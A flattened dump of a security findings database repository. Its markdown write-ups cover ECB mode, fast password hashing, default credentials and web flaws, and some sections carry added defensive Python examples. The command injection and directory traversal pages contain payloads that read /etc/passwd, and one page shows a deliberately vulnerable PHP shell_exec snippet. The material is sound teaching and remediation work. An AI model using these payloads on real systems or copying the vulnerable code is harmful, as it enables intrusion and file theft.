├── .gitignore
├── Assets
│   └── Web
│       ├── SQLi_0.png
│       ├── SQLi_1.png
│       ├── SQLi_2.png
│       ├── SQLi_3.png
│       ├── injection_0.png
│       ├── injection_1.png
│       ├── injection_2.png
│       └── injection_3.png
├── CONTRIBUTING.md
├── Crypto
│   ├── Block_Cipher_Uses_ECB_Mode.md
│   └── Password_Storage_Via_Fast_Hashing_Algorithm.md
├── LICENSE
├── Printers
│   └── Default_Credential.md
├── README.md
├── TEMPLATE.md
├── Tomcat
│   └── Default Credential.md
├── Web
│   ├── Command_Injection.md
│   ├── Default_Credential.md
│   ├── Directory_Traversal.md
│   ├── Insecure_Direct_Object_Reference.md
│   ├── Redirection_Based_Privilege_Escalation.md
│   ├── SQL_Injection.md
│   ├── Server-Side Request Forgery.md
│   ├── WeakSSL.md
│   ├── XSS_Reflective.md
│   ├── XSS_Stored.md
│   ├── XSTE.md
│   └── imgs
│       ├── ssrf1.png
│       ├── ssrf2.png
│       ├── ssrf3.png
│       ├── ssrf4.png
│       └── ssrf5.png
├── Windows
│   ├── Old_KRBTGT_Password.md
│   ├── Powershell.md
│   ├── Shared_Admin.md
│   ├── WDigest.md
│   ├── WPAD.md
│   └── Weak_SPN_Password.md
└── Wireless
    ├── EAP-TLS.md
    ├── WEP.md
    ├── WPA-PSK.md
    └── WPS.md

--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
.DS_Store

--------------------------------------------------------------------------------
/Assets/Web/SQLi_0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Assets/Web/SQLi_0.png

--------------------------------------------------------------------------------
/Assets/Web/SQLi_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Assets/Web/SQLi_1.png

--------------------------------------------------------------------------------
/Assets/Web/SQLi_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Assets/Web/SQLi_2.png

--------------------------------------------------------------------------------
/Assets/Web/SQLi_3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Assets/Web/SQLi_3.png

--------------------------------------------------------------------------------
/Assets/Web/injection_0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Assets/Web/injection_0.png

--------------------------------------------------------------------------------
/Assets/Web/injection_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Assets/Web/injection_1.png

--------------------------------------------------------------------------------
/Assets/Web/injection_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Assets/Web/injection_2.png

--------------------------------------------------------------------------------
/Assets/Web/injection_3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Assets/Web/injection_3.png

--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
/*
Title: How to Contribute
Description: How to contribute to the CFDB
*/

If you wish to contribute, you can do so in a couple of ways:

1. If you hate git, and everyone can understand that, simply copy and paste text into an "Issue" and we'll format it correctly and give proper attribution.
2. If you are so bold, please submit pull requests.

Our format can be found on the template page so you can easily copy and paste it to get started (you do not have to include any sections that are not applicable, or that you simply don't want to write).

--------------------------------------------------------------------------------
/Crypto/Block_Cipher_Uses_ECB_Mode.md:
--------------------------------------------------------------------------------
/*
Title: Block Cipher Uses ECB Mode
Description: A block cipher using ECB mode may reveal the contents of its ciphertext.
*/

- LAST UPDATED DATE: 2015/12/1
- LAST UPDATED BY: @zaeyx

## Summary

A block cipher in ECB mode encrypts every block of plaintext into ciphertext without using any additional nonce or chaining input. As a result, every pair of matching plaintext blocks produces a pair of matching ciphertext blocks.

## Capabilities and Risk

Each block is still encrypted to the specification of the algorithm selected, but ECB mode does nothing to differentiate the output of one block from that of any other identical block. In effect, if you encrypted the message "zaeyx is a cool dude, dude.", the two "dude"s would come out as the same ciphertext; the output might look something like "yuqbd jd q eadn defg, defg." This reveals information about the plaintext and might, in some cases, be enough to allow decryption of the entire message.

## Detection

A block cipher operating in this mode can be detected by observing the output ciphertext for repeating patterns whose length equals one block length.
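The repeated-block check described above, as an added example that is not part of the CFDB page: a toy Feistel block cipher (built on HMAC-SHA256 so the script needs only the standard library, standing in for AES or any real cipher) is run in ECB and in CBC mode over a constructed plaintext with a repeated 16-byte record, and the detector counts duplicate ciphertext blocks in each output.

```python
"""Detect ECB mode from ciphertext alone: identical plaintext blocks give
identical ciphertext blocks, so any repeated block is a red flag.

Added example, not code from the CFDB project. The cipher is a toy
construction for the demo; the leak it shows is a property of ECB mode,
not of this particular cipher.
"""
import hashlib
import hmac
import os
from collections import Counter

BLOCK = 16  # bytes, the same block size as AES


def _round(key: bytes, rnd: int, half: bytes) -> bytes:
    # Keyed round function; a Feistel round function only needs to be a PRF.
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def toy_block_encrypt(key: bytes, block: bytes) -> bytes:
    """Four-round Feistel network over one 16-byte block (toy cipher)."""
    assert len(block) == BLOCK
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _round(key, rnd, right))
    return left + right


def toy_block_decrypt(key: bytes, block: bytes) -> bytes:
    """Inverse of toy_block_encrypt; shows the toy is a real permutation."""
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _round(key, rnd, left)), left
    return left + right


def pad(data: bytes) -> bytes:
    """PKCS#7 padding to a whole number of blocks."""
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def ecb_encrypt(key: bytes, plaintext: bytes) -> bytes:
    """ECB: each block encrypted independently, no IV, no chaining."""
    data = pad(plaintext)
    return b"".join(toy_block_encrypt(key, data[i:i + BLOCK])
                    for i in range(0, len(data), BLOCK))


def cbc_encrypt(key: bytes, plaintext: bytes, iv: bytes) -> bytes:
    """CBC: each block is XORed with the previous ciphertext block first."""
    data = pad(plaintext)
    prev, out = iv, []
    for i in range(0, len(data), BLOCK):
        prev = toy_block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return iv + b"".join(out)


def repeated_blocks(ciphertext: bytes, block_size: int = BLOCK) -> int:
    """Number of ciphertext blocks that duplicate an earlier block.
    A value above 0 in a ciphertext of modest length points at ECB mode."""
    usable = len(ciphertext) - len(ciphertext) % block_size
    blocks = [ciphertext[i:i + block_size] for i in range(0, usable, block_size)]
    return sum(count - 1 for count in Counter(blocks).values())


def demo() -> dict:
    """Constructed input: the same 16-byte record appears three times."""
    key = b"constructed-demo-key-not-secret!"
    record = b"dude, cool dude!"  # exactly one block
    plaintext = record * 3 + b"tail"
    ecb_ct = ecb_encrypt(key, plaintext)
    cbc_ct = cbc_encrypt(key, plaintext, os.urandom(BLOCK))
    return {"ecb_repeats": repeated_blocks(ecb_ct),   # 2: blocks 2 and 3 repeat block 1
            "cbc_repeats": repeated_blocks(cbc_ct)}   # 0: chaining hides the repeats


if __name__ == "__main__":
    print(demo())
```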
With access to the cipher's implementation in code, one can check directly whether ECB is the mode of operation.

## Remediation

Do not operate block ciphers in ECB mode. Switch to a preferred mode such as CTR (counter) mode or CBC (cipher block chaining), among others.

## References

https://crypto.stackexchange.com/questions/20941/why-shouldnt-i-use-ecb-encryption
https://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Eng.pdf
https://news.ycombinator.com/item?id=7959519

## Exploitation

An attacker may exploit a ciphertext encrypted in this manner by comparing blocks to find repeating patterns. The attacker may then use this information to reveal the plaintext of the ciphertext through careful analysis.

--------------------------------------------------------------------------------
/Crypto/Password_Storage_Via_Fast_Hashing_Algorithm.md:
--------------------------------------------------------------------------------
/*
Title: Password Storage Uses Fast Hashing Algorithm
Description: Storing password hashes produced from fast hashing algorithms increases the odds of passwords being cracked.
*/

- LAST UPDATED DATE: 2015/12/2
- LAST UPDATED BY: @zaeyx

## Summary

Hashing algorithms are the de facto standard for the on-disk representation of passwords. Such algorithms are defined to operate in one direction only: they turn plaintext passwords into their hashed form, and cannot take a hash and "decrypt" it back into a plaintext password. As such, an attacker attempting to recover the plaintext associated with a hash has only one option: brute-force attempts at producing a matching hash. Since hashing algorithms must by definition also be deterministic, if the attacker finds an input whose hash matches the hash he is attempting to "crack", he can assume beyond all reasonable doubt that the plaintext he used to create that hash is the user's plaintext password.

The difference between "fast" and "slow" hashing algorithms is exactly that: one takes very little time to compute, the other takes much longer (is slow).

When dealing with fast hashing algorithms, an attacker is able to make many more guesses in the same amount of time, increasing his chance of finding the plaintext password.

## Capabilities and Risk

Fast hashing algorithms are used primarily for their simplicity and ease of use, and for their speed and insignificant load on computational resources. However, when using fast hashing algorithms you must understand that the passwords stored with them are potentially orders of magnitude easier for an attacker to reveal, should he gain access to the stored hashes.

With the plaintext passwords in hand, the attacker is highly likely to use the information to further his malicious intentions, or to leak the plaintext passwords on the internet in an attempt to embarrass and humiliate your service in the eyes of the public.

## Detection

Detection of such a vulnerability is exceedingly simple. Determine whether the algorithm your service uses to hash passwords is a fast or a slow hashing algorithm (if it is a hashing algorithm at all).

Examples of fast hashing algorithms are as follows:
* [SHA-1](https://en.wikipedia.org/wiki/SHA-1)
* [MD-5](https://en.wikipedia.org/wiki/MD5)
* [SHA-2](https://en.wikipedia.org/wiki/SHA-2)
* [LM](https://en.wikipedia.org/wiki/LM_hash)

If access to the application is too limited to ascertain the name of the algorithm used, it is often possible to determine the algorithm that generated a hash by looking at the hash itself.

One tool capable of performing this analysis to a limited extent is John the Ripper, which can be found [here.](http://www.openwall.com/john/)

## Remediation

Remediation is simple. Upgrade any system capable of receiving such an upgrade to a slow hashing algorithm.

Examples are as follows:
* [BCrypt](https://en.wikipedia.org/wiki/Bcrypt)
* [Crypt](https://en.wikipedia.org/wiki/Crypt_(C))
* [PBKDF2](https://en.wikipedia.org/wiki/PBKDF2)

Another interesting hashing algorithm is [SCrypt](https://en.wikipedia.org/wiki/Scrypt), which uses extensive amounts of memory rather than time in order to limit an attacker's ability to compute in parallel when attacking a hash.

If for some reason it is impossible for a system or service to be upgraded from a fast hashing algorithm, it is then paramount that a proper password policy be set and enforced in order to increase the complexity of stored passwords and increase the work the attacker must perform.

An example of a password policy that might mitigate the use of a fast hashing algorithm to some extent is as follows:

> Min-Length: 21
> Must Contain: Upper/Lower Alpha, Numeric, Special Char
> Recommend: Passphrase, not password

## References

http://codahale.com/how-to-safely-store-a-password/

https://security.stackexchange.com/questions/4781/do-any-security-experts-recommend-bcrypt-for-password-storage

https://security.stackexchange.com/questions/15790/why-do-people-still-use-recommend-md5-if-it-is-cracked-since-1996

https://crackstation.net/hashing-security.htm

## Exploitation

Exploitation for an attacker is quite simple. Just load an unknown hash into a hash-cracking piece of software such as [John the Ripper](http://www.openwall.com/john/) and wait. With a fast hashing algorithm and a bit of luck, it won't take long.
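Two points from the finding above in code, as an added example that is not part of the CFDB page: the Detection section's observation that the algorithm can often be read off the stored hash itself, and the Remediation section's move to a slow, salted algorithm (PBKDF2-HMAC-SHA256 from the standard library). The storage string format `pbkdf2_sha256$<iterations>$<salt_hex>$<hash_hex>` is this example's own convention, and the sample hashes are constructed.

```python
"""Triage stored password hashes and store new ones with a slow algorithm.

Added example, not code from the CFDB project. The stored-hash format and
the sample values are constructed for the demo.
"""
import hashlib
import hmac
import os
import re
from typing import Dict, Iterable

# Work factor: make a single guess expensive. Tune so that one hash takes
# on the order of 100 ms on the hardware that verifies logins.
ITERATIONS = 600_000


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Salted, iterated PBKDF2-HMAC-SHA256; one random salt per password."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in
    constant time so timing does not leak how many bytes matched."""
    algo, iters, salt_hex, hash_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), hash_hex)


# Unsalted hex digests are recognisable by length alone; 32 hex characters
# is ambiguous between MD5, LM and NTLM, and all three are fast.
_HEX_LENGTHS = {
    32: "MD5 / LM / NTLM (fast, unsalted)",
    40: "SHA-1 (fast, unsalted)",
    64: "SHA-256 (fast, unsalted)",
    128: "SHA-512 (fast, unsalted)",
}

# Modular crypt style prefixes identify the scheme explicitly.
_PREFIXES = [
    (re.compile(r"^\$2[aby]\$\d\d\$"), "bcrypt (slow)"),
    (re.compile(r"^\$6\$"), "sha512crypt (slow, iterated)"),
    (re.compile(r"^\$5\$"), "sha256crypt (slow, iterated)"),
    (re.compile(r"^\$7\$"), "scrypt (slow, memory-hard)"),
    (re.compile(r"^\$argon2(id|i|d)\$"), "Argon2 (slow, memory-hard)"),
    (re.compile(r"^pbkdf2_sha256\$\d+\$"), "PBKDF2-HMAC-SHA256 (slow)"),
]


def classify_hash(stored: str) -> str:
    """Best-effort identification of a stored hash from its shape."""
    for pattern, label in _PREFIXES:
        if pattern.match(stored):
            return label
    if re.fullmatch(r"[0-9a-fA-F]+", stored) and len(stored) in _HEX_LENGTHS:
        return _HEX_LENGTHS[len(stored)]
    return "unknown"


def is_fast(stored: str) -> bool:
    """True when the hash should be migrated per the Remediation section."""
    return "fast" in classify_hash(stored)


def audit(hashes: Iterable[str]) -> Dict[str, str]:
    """Map each stored hash to its classification, e.g. for a dump review."""
    return {h: classify_hash(h) for h in hashes}


if __name__ == "__main__":
    # Constructed samples: MD5 and SHA-1 of the string "password", a
    # bcrypt-shaped string, and one hash produced by this module.
    samples = [hashlib.md5(b"password").hexdigest(),
               hashlib.sha1(b"password").hexdigest(),
               "$2b$12$" + "x" * 53,
               hash_password("correct horse battery staple")]
    for h, label in audit(samples).items():
        print(f"{label:40s} {h[:24]}...")
```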
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
BSD 3-Clause License

Copyright (c) 2019, Rob Fuller
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:

1. Redistributions of source code must retain the above copyright notice, this
   list of conditions and the following disclaimer.

2. Redistributions in binary form must reproduce the above copyright notice,
   this list of conditions and the following disclaimer in the documentation
   and/or other materials provided with the distribution.

3. Neither the name of the copyright holder nor the names of its
   contributors may be used to endorse or promote products derived from
   this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

--------------------------------------------------------------------------------
/Printers/Default_Credential.md:
--------------------------------------------------------------------------------
/*
Title: Default Credential (Printers)
Description: Default credentials in printers are often overlooked because of a misunderstood level of security risk.
Access to printers can give details used for data loss, network discovery, and firmware loading, which can allow
additional functionality to be loaded.
*/

- LAST UPDATED DATE: 12/16/2015
- LAST UPDATED BY: Joey M. (l0stkn0wledge)

## Summary

Most enterprise printers and many SOHO devices ship with an interface allowing remote configuration of the devices
located on the network. In many cases, the security of these systems is overlooked due to a lack of understanding of
the capabilities of these devices. This can allow printers to act as a means to gain network details and to potentially
gain access to sensitive information being printed.

## Capabilities and Risk

Many of the capabilities and risks depend on the features of the printer. More advanced devices will often provide
details of the documents printed, including potential username information. Some printers may have "advanced functions"
that can provide additional network information.

- Gain access to printer files and configuration
- Execute programs from the printer by loading custom firmware images
- Read files on the printer and potentially intercept printed files

## Detection

Printers with web UIs will most often use the standard HTTP/HTTPS ports (80/443). Additional functionality may also be
exposed through the printer ports (e.g. HP JetDirect port 9100).

## Remediation

Printers should have all web interface passwords changed to strong passwords.
Additionally, it is important to ensure that only SSL is available for login when the option is available.

## References

- IronGeek page on Printer Hacking (http://www.irongeek.com/i.php?page=security/networkprinterhacking)
- Deral Heiland: From Printer to Pwned (https://www.youtube.com/watch?v=PH4pTCmKgOg)
- Extensive Default Password List (http://www.defaultpassword.com/)

## Exploitation

Standard web interface used for accessing the UI and entering passwords.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
/*
Title: What is the CFDB?
Description: Search engine meta data about the finding
*/

# Common Findings Database

Source: https://github.com/mubix/cfdb

The Common Findings Database is a collection of markdown-based findings writeups.
Its goal is threefold:

1. Create a place for collaboration to happen in regard to findings
2. Help to unify finding recommendations and references
3. Assist new and upcoming Information Security professionals in learning

You can find the live, searchable version at http://cfdb.io/

Other awesome projects along the same lines:

- MITRE's ATT&CK: https://attack.mitre.org/wiki/Main_Page
- TECAPI List of Attack Vectors: http://tecapi.com/
- VULNDB User, contributor and developer friendly vulnerability database: https://github.com/vulndb/data
- Vulnerability Reporting Database by @calebwatt15: https://github.com/calebwatt15/vrdb
- Veris Community Database: https://github.com/vz-risk/VCDB

--------------------------------------------------------------------------------
/TEMPLATE.md:
--------------------------------------------------------------------------------
/*
Title: Template
Description: Search engine meta data about the finding
*/

- LAST UPDATED DATE:
- LAST UPDATED BY:

## Summary

A brief summary of the finding

## Capabilities and Risk

This is to replace any "level" or "score" because of how much context is needed
for a finding to have one, which is beyond the scope of this database.

- List of possible uses for this finding to give real-world uses
- Read files as www-data (or whichever user the web server is running as)
- DDoS service
- Code execution (for this one to fly there needs to be a reference proving it)

## Detection

How does one detect the exploitation of this finding, or detect its presence.

## Remediation

What are some of the ways to fix this finding?

## References

- Link to blog post
- Link to CVE
- Link to Metasploit module
- Link to Nessus/NeXpose/Qualys write up

## Exploitation

A write up on how this finding can be exploited with demo code or screen shots


## Copy / Paste:
```
/*
Title: Finding Title
Description: Search engine meta data about the finding
*/

- LAST UPDATED DATE:
- LAST UPDATED BY:

## Summary

A brief summary of the finding

## Capabilities and Risk

This is to replace any "level" or "score" because of how much context is needed
for a finding to have one, which is beyond the scope of this database.

- List of possible uses for this finding to give real-world uses
- Read files as www-data (or whichever user the web server is running as)
- DDoS service
- Code execution (for this one to fly there needs to be a reference proving it)

## Detection

How does one detect the exploitation of this finding, or detect its presence.

## Remediation

What are some of the ways to fix this finding?

## References

- Link to blog post
- Link to CVE
- Link to Metasploit module
- Link to Nessus/NeXpose/Qualys write up

## Exploitation

A write up on how this finding can be exploited with demo code or screen shots
```

--------------------------------------------------------------------------------
/Tomcat/Default Credential.md:
--------------------------------------------------------------------------------
/*
Title: Tomcat Manager - Default Login Credentials
Description: Search engine meta data about the finding
*/

- LAST UPDATED DATE: 2015/11/25
- LAST UPDATED BY: @mubix

## Summary

Default Tomcat Management credentials

## Capabilities and Risk

This is to replace any "level" or "score" because of how much context is needed
for a vulnerability to have one, which is beyond the scope of this database.

- List of possible uses for this vulnerability to give real-world uses
- Read files as www-data (or whichever user the web server is running as)
- DDoS service
- Code execution (for this one to fly there needs to be a reference proving it)

## Detection

Default credentials can be tried by authenticating with the HTTP Tomcat login. The list below contains default Tomcat credentials.

**username/password**
- tomcat/tomcat
- both/tomcat
- role1/tomcat
- manager/manager
- admin/admin


## Remediation

Default accounts should be disabled or have their password reset.
## References

- Link to blog post
- Link to CVE
- Link to Metasploit module
- Link to Nessus/NeXpose/Qualys write up

## Exploitation

The Tomcat management console can be accessed by navigating to the URL: http://x.x.x.x:8080/manager

--------------------------------------------------------------------------------
/Web/Command_Injection.md:
--------------------------------------------------------------------------------
/*
Title: Command Injection
Description: Injection of commands through a web application onto the host machine.
*/

- LAST UPDATED DATE: 2015/12/1
- LAST UPDATED BY: @zaeyx

## Summary

Command Injection occurs when an insecure application passes unsafe user-supplied content to a system shell.

## Capabilities and Risk

When Command Injection occurs, an attacker may be able to execute arbitrary commands on the web application's host machine. This gives effective control over whatever portion of the host machine the web server's user has access to.

## Detection

Detection can be accomplished by searching for command line activity by the web server's user that the normal operation of the application would not produce. For example, if an application uses command line operations to perform a ping, and the web server's user is executing any command other than "ping", you might have a problem.

One can search for abnormal commands in a number of ways, including but not limited to: monitoring the web user's command line history, monitoring logs (such as Apache's access.log), monitoring network traffic to detect requests on the wire (an IDS, for example), and hardcoding monitoring routines into the application itself.

## Remediation

Sanitize input that is passed to the system shell from an untrusted source.

Here are a number of resources to assist you in properly sanitizing data in a number of languages.

[PHP](https://stackoverflow.com/questions/982904/best-way-to-sanitize-exec-command-with-user-inserted-variables)

[ASP.NET](https://msdn.microsoft.com/en-us/library/ff647397.aspx)

[Ruby Rails](https://code.google.com/p/ruby-security/wiki/Guide#Good_ol%27_shell_injection)

[Java](https://www.securecoding.cert.org/confluence/display/java/IDS07-J.+Sanitize+untrusted+data+passed+to+the+Runtime.exec()+method)

[Python/Ruby](http://blog.littleimpact.de/index.php/2008/08/11/avoiding-shell-injection-in-ruby-python-and-php/)

Input sanitization is accomplished by removing or escaping special characters from user-supplied input, or by properly quoting the user-supplied input.


## References

https://www.owasp.org/index.php/Command_Injection

## Exploitation

To exploit this vulnerability, an attacker simply injects into a vulnerable field a command separator for the system type (Linux, Windows) of the host machine in question, followed by the command to be executed.

The command separator is used to end the command that the application expects to execute, and everything that follows is appended as additional commands to the application's usual request.

For example, if an application takes user input in the form of an IP address to "ping" from the command line, and the application does not correctly sanitize input, a normal request might look like "ping user_supplied_ip". The injection might look like "ping && cat /etc/passwd".

The example is illustrated below.

```php
<?php
// Most of this snippet was lost in extraction; the lines are reconstructed
// from the page's description (a ping form whose IP field is dropped onto
// the command line and whose output is echoed). The field name "ip" and the
// ping arguments are assumptions. The user value reaches the shell unsanitized.
if (isset($_POST['ip'])) {
    $ip = $_POST['ip'];
    $output = shell_exec("ping -c 4 " . $ip);
    echo "<pre>$output</pre>";
}
?>
```
The PHP code above is vulnerable to command injection since it does not sanitize any input.
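The hardened counterpart to the ping handler, plus the log-side check the Detection section describes, as an added example that is not part of the CFDB page (written in Python rather than PHP so it runs stand-alone). The parameter name `ip` follows the page's form; the access.log lines are constructed.

```python
"""Fixed ping handler: validate the value as an IP address and never hand
it to a shell; and a detector that flags shell metacharacters in logged
query parameters.

Added example, not code from the CFDB project. Log lines are constructed.
"""
import ipaddress
import re
import subprocess
from typing import List
from urllib.parse import parse_qs, unquote, urlsplit


def build_ping_argv(user_value: str, count: int = 4) -> List[str]:
    """Validate first, then build an argv list. Passing a list with
    shell=False means no shell ever parses the value, so separators such as
    ';' or '&&' would be plain bytes in one argument; validation rejects
    them before that point anyway. Raises ValueError on bad input."""
    addr = ipaddress.ip_address(user_value.strip())
    return ["ping", "-c", str(count), str(addr)]


def is_valid_target(user_value: str) -> bool:
    """What the request handler checks before doing anything else."""
    try:
        build_ping_argv(user_value)
        return True
    except ValueError:
        return False


def run_ping(user_value: str) -> str:
    """The request handler's body. Not exercised by the tests (needs network)."""
    if not is_valid_target(user_value):
        return "invalid address"
    result = subprocess.run(build_ping_argv(user_value), capture_output=True,
                            text=True, timeout=15)
    return result.stdout


# Characters that only matter if the value is being handed to a shell.
SHELL_META = re.compile(r"[;&|`$<>\n]")
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_params(log_line: str) -> List[str]:
    """Return 'key=value' for every decoded query value in an Apache
    access.log line that contains shell metacharacters."""
    match = REQUEST_LINE.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    hits = []
    for key, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            value = unquote(value)  # second decode catches double-encoding
            if SHELL_META.search(value):
                hits.append(f"{key}={value}")
    return hits


# Constructed access.log lines: one ordinary ping request and one carrying
# the page's "&& cat /etc/passwd" injection, percent-encoded as a browser would.
LOG_LINES = [
    '10.0.0.5 - - [01/Dec/2015:10:00:01 +0000] "GET /ping.php?ip=10.0.0.1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Dec/2015:10:00:07 +0000] '
    '"GET /ping.php?ip=10.0.0.1%20%26%26%20cat%20%2Fetc%2Fpasswd HTTP/1.1" 200 2048',
]


if __name__ == "__main__":
    for line in LOG_LINES:
        print(suspicious_params(line) or "clean")
```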
**Here is what the ping form might look like with a user-supplied IP to ping.**
![injection](../Assets/Web/injection_0.png)

**Once the user submits the form, the site takes the IP parameter and drops it to the command line, where it executes the command above.**
![injection](../Assets/Web/injection_1.png)

**However, if the user were to supply a command separator as seen here (Linux command separator), they would be able to execute arbitrary commands, not just ping.**
![injection](../Assets/Web/injection_2.png)

**And the results...**
![injection](../Assets/Web/injection_3.png)

As you can see, exploitation is quite simple in a basic scenario like this.

--------------------------------------------------------------------------------
/Web/Default_Credential.md:
--------------------------------------------------------------------------------
/*
Title: Default/Guessable Login Credentials
Description: Search engine meta data about the finding
*/

- LAST UPDATED DATE:
- LAST UPDATED BY:

## Summary

A brief summary of the vulnerability

## Capabilities and Risk

This is to replace any "level" or "score" because of how much context is needed
for a vulnerability to have one, which is beyond the scope of this database.

- List of possible uses for this vulnerability to give real-world uses
- Read files as www-data (or whichever user the web server is running as)
- DDoS service
- Code execution (for this one to fly there needs to be a reference proving it)

## Detection

How does one detect the exploitation of this vulnerability, or detect its presence.

## Remediation

What are some of the ways to fix this vulnerability?

## References

- Link to blog post
- Link to CVE
- Link to Metasploit module
- Link to Nessus/NeXpose/Qualys write up

## Exploitation

A write up on how this vulnerability can be exploited with demo code or screen shots


--------------------------------------------------------------------------------
/Web/Directory_Traversal.md:
--------------------------------------------------------------------------------
/*
Title: Directory Traversal / File Include
Description: Web server ACLs permit direct access to files outside the intended directory
*/

- LAST UPDATED DATE: 12/14/2015
- LAST UPDATED BY: Mike S. (hardwaterhacker)

## Summary

Insufficient web server ACLs and/or input sanitization allow direct file access requests for files outside of the
intended directory or document root directory.

## Capabilities and Risk

- Information disclosure (reading files as the web server user)
- Overwriting files (as the web server user)
- Denial of Service

## Detection

To detect directory traversal vulnerabilities, the application must first be mapped to identify parameters which
reference files on the server, such as /profile.php?user=bob.html or /display.asp?page=../main.html. Once the target
pages and parameters have been identified, attempt to access files which would likely reside on the target system.
Identifying the operating system, web server software and version, and application version will assist in identifying
likely candidates.

If the server is vulnerable to directory traversal, it will be possible to "escape" from the intended directory and/or
document root by referencing a series of directories above the intended directory using dot-dot-slash ("../")
notation. Depending on the starting directory, several dot-dot-slashes may be needed to reach the target directory.

Example #1: Linux password file

http://www.example.com/profile.php?user=../../../../../etc/passwd

Example #2: Windows system.ini

http://www.example.com/display.asp?page=../../../../../Windows/system.ini

### Windows Web Servers

If the target web server is running on Windows, it may be necessary to use backslashes ("\") instead of forward slashes.

### Absolute Path Traversal

In some instances, it may be possible to specify the absolute path of the file.

Example #3: Linux password file via absolute path traversal

http://www.example.com/profile.php?user=/etc/passwd

### Encoding

During testing, it may appear that the web server ACLs and input sanitization are functioning properly. Testing should
also include requests using character encoding to bypass input sanitization routines in the application.

Encoding Example #1:

http://www.example.com/profile.php?user=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

Encoding Example #2:

http://www.example.com/profile.php?user=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

### Overwriting files

If the web application uses client-supplied input to specify the target location or file name for file uploads, it may
be possible to overwrite existing files, provided the web server user has write permissions to the target file and
directory. In some instances, this may result in a denial of service condition. Testing for directory traversal file
overwrite vulnerabilities uses the same methods outlined above.

## Remediation

The developer should define the intended document root directory or directories that are valid for the file access
request. All file access requests should be compared against this list of valid directories.
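The document-root check in code, as an added example that is not part of the CFDB page: the requested name is percent-decoded (repeatedly, so the `..%2f`, `%2e%2e` and double-encoded forms from the Detection section are judged in decoded form), backslashes are treated as separators, each path component must pass a whitelist filter, and the resolved path must still lie inside the root. The document root, file names and request values are constructed; the demo runs against a temporary directory.

```python
"""Resolve a client-supplied file name inside an allow-listed document root
and refuse anything that escapes it.

Added example, not code from the CFDB project. All paths are constructed.
"""
import re
import tempfile
from pathlib import Path
from typing import Dict, Optional
from urllib.parse import unquote

# Whitelist filter for one path component: starts with a letter or digit,
# then letters, digits, '_', '.' or '-'. Neither '.' nor '..' passes.
SAFE_COMPONENT = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]*$")


def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding so that ..%2f, %2e%2e
    and double-encoded %252e are all checked in their decoded form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_within(root: Path, user_value: str) -> Optional[Path]:
    """Return the real path of the requested file if it lies inside root,
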